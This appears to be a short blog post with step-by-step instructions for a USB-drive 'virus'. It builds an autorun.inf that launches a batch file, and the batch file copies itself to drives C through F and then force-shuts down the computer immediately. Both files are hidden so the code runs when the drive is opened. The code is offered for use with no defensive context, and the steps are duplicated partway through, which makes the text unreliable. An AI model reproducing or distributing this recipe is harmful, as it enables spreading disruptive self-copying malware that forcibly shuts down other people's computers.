.
.
1. Connect your pen drive first. Open Notepad and type following:
[autorun]
ShellExecute=mak.bat
.
2. And save it name "Autorun.inf ". You should give the same name i.e "Autorun.inf".
.
3. Open a another Notepad document and type following:
@echo off
xcopy "Autorun.inf"/H c:
xcopy "Autorun.inf"/H d:
xcopy "Autorun.inf"/H e:
xcopy "Autorun.inf"/H f:
xcopy "mak.bat"/H c:
xcopy "mak.bat"/H d:
xcopy "mak.bat"/H e:
xcopy "mak.bat"/H f:
shutdown -s -f -t 00
.
4. Save this file name "mak.bat".
.
5. Change the properties of the files in "Hidden". Copy the both files(Autorun.inf and mak.bat) in to your pen drive. Reconnect the pen drive. And open the pen drive. You will get the result.
[autorun]
ShellExecute=mak.bat
.
2. And save it name "Autorun.inf ". You should give the same name i.e "Autorun.inf".
.
3. Open a another Notepad document and type following:
@echo off
xcopy "Autorun.inf"/H c:
xcopy "Autorun.inf"/H d:
xcopy "Autorun.inf"/H e:
xcopy "Autorun.inf"/H f:
xcopy "mak.bat"/H c:
xcopy "mak.bat"/H d:
xcopy "mak.bat"/H e:
xcopy "mak.bat"/H f:
shutdown -s -f -t 00
.
4. Save this file name "mak.bat".
.
5. Change the properties of the files in "Hidden". Copy the both files(Autorun.inf and mak.bat) in to your pen drive. Reconnect the pen drive. And open the pen drive. You will get the result.
No comments:
Post a Comment